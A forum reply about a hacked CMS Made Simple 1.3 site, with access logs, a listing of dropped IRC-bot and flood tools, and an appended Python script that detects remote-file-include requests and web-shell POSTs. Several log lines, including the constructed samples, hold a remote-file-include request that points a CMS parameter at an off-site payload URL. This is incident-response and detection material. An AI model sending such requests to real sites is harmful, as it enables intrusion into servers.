calguy1000 wrote:
we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other vulnerable script on the server.
Hi
here are the answers:
a: 1.3, updated 2 or 3 days ago
b: I normally update ASAP; within 2 or 3 days after a new release is online
c: here are the logs
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:44 +0200] "POST /s.php HTTP/1.1" 200 6777 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
08/access_log:72.46.131.186 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
My provider found a file called s.php on the root of the domain and suspicious directories under TMP:
1. Domain, everything in folder FL:
03.09.2006 02:02 20.358 configure
11.06.2008 12:43 contrib
11.06.2008 00:00 64 cyc.acc
11.06.2008 11:00 1.047 cyc.levels
10.06.2008 22:00 6 cyc.pid
11.06.2008 11:00 298 cyc.session
19.05.2008 10:12 1.310 cyc.set
03.09.2006 02:03 4.144 genuser
14.07.2005 14:51 590.481 httpd
10.07.2005 15:31 2.156 Makefile
11.06.2008 12:43 randfiles
05.07.2005 13:38 13.399 stealth
01.06.2006 14:40 21.534 xhide
11 file(s), 654.797 bytes
Directory of \contrib
11.06.2008 12:43 .
11.06.2008 12:43 ..
11.06.2008 12:43 config
23.06.2001 18:36 1.251 cvsupdate
11.06.2008 12:43 patches
1 file(s), 1.251 bytes
Directory of \config
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.843 config
07.04.2001 04:38 1.131 Input.pl
11.06.2008 12:43 servers
2 file(s), 6.974 bytes
Directory of \servers
11.06.2008 12:43 .
11.06.2008 12:43 ..
02.05.2001 09:40 289 DALNET
02.05.2001 09:40 543 EFNET
23.06.2001 04:18 735 UNDERNET
3 file(s), 1.567 bytes
Directory of \patches
11.06.2008 12:43 .
11.06.2008 12:43 ..
20.06.2001 03:32 6.901 emech-2.8.2-sha.diff
1 file(s), 6.901 bytes
Directory of \randfiles
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.195 randaway.e
07.04.2001 04:38 3.982 randinsult.e
07.04.2001 04:38 830 randkicks.e
07.04.2001 04:38 519 randnicks.e
07.04.2001 04:38 2.495 randpickup.e
07.04.2001 04:38 55.316 randsay.e
07.04.2001 04:38 3.651 randsignoff.e
07.04.2001 04:38 1.465 randversions.e
2. Domain, everything in Dir FLOOD:
08.09.2002 04:51 15.988 juno
09.02.2001 04:30 8.268 slice2
01.10.2001 20:59 8.268 slice3
06.08.2000 14:56 13.399 stealth
07.02.1996 03:38 17.690 synk
07.03.2002 05:29 14.911 vadimII
By now I have added the security things from the security thread. Hope that's enough.
Regards
Thorsten
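The two log shapes in the post above are the ones worth automating a search for: a request whose query parameter carries an off-site URL (the remote-file-include shape, here against `//lib/config.functions.php?dirname=http://...id.txt??`, sent by a `libwww-perl` client), and POSTs to a PHP file at the web root that the CMS never shipped (`s.php`, a dropped web shell). The directory listings (an `emech-2.8.2-sha.diff` patch, `genuser`, `randfiles`, and a FLOOD folder) are post-compromise tooling, not the entry point; the access log is what shows how they got in. The script below is an added example and is not part of Thorsten's post or of the CMS: it parses Apache combined-format lines and flags both patterns. The sample lines are constructed (example IP ranges and hostnames), and the allow-list of scripts that may legitimately receive POSTs is a hypothetical placeholder that a real run would replace with the CMS's actual entry points.

```python
import re
import posixpath
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined-log format, shaped like the
# entries quoted in the post; IPs and hostnames are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://203.0.113.5/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
192.0.2.20 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.0.2.20 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.example.com/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.0.2.30 - - [10/Jun/2008:09:00:00 +0200] "GET /index.php?page=news HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Hypothetical allow-list (assumption, not taken from the CMS): scripts that
# legitimately receive POSTs. Anything else receiving a POST is suspect.
KNOWN_POST_TARGETS = {"/index.php", "/admin/login.php"}


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    path, _, query = entry["target"].partition("?")
    # Collapse "//lib/x.php" and "/a/../x.php" to a canonical path so that
    # attacker variations still compare against the allow-list.
    entry["path"] = "/" + posixpath.normpath(path).lstrip("/")
    entry["params"] = parse_qsl(query, keep_blank_values=True)  # values are URL-decoded
    return entry


def remote_includes(entry):
    """Return (param, value) pairs whose value is an off-site URL: the RFI shape."""
    return [(name, value) for name, value in entry["params"] if REMOTE_URL_RE.match(value)]


def triage(log_text, known_post_targets=KNOWN_POST_TARGETS):
    """Scan log text and return a list of findings for the two patterns of interest."""
    findings = []
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        for name, value in remote_includes(e):
            # A trailing "?" or "??" on the fetched URL turns whatever the vulnerable
            # script appends to the parameter into a query string on the attacker's
            # host, so include() fetches exactly the attacker's file.
            findings.append({
                "kind": "rfi", "ip": e["ip"], "path": e["path"],
                "param": name, "url": value,
                "scripted_client": e["ua"].lower().startswith("libwww-perl"),
            })
        if e["method"] == "POST" and e["path"] not in known_post_targets:
            # A POST to an unknown root-level script whose referer is itself is the
            # typical shape of someone driving a web shell's HTML form.
            findings.append({
                "kind": "post-to-unknown-script", "ip": e["ip"], "path": e["path"],
                "status": e["status"], "referer_self": e["referer"].endswith(e["path"]),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

Run it against the real access logs with `triage(open("access_log").read())`; the `ip` field of each finding gives the addresses to pivot on (every other request from those IPs, and the first request to `s.php`, bracket the time of the compromise), and `scripted_client` separates the automated scanner that found the hole from the interactive session that used the shell afterwards.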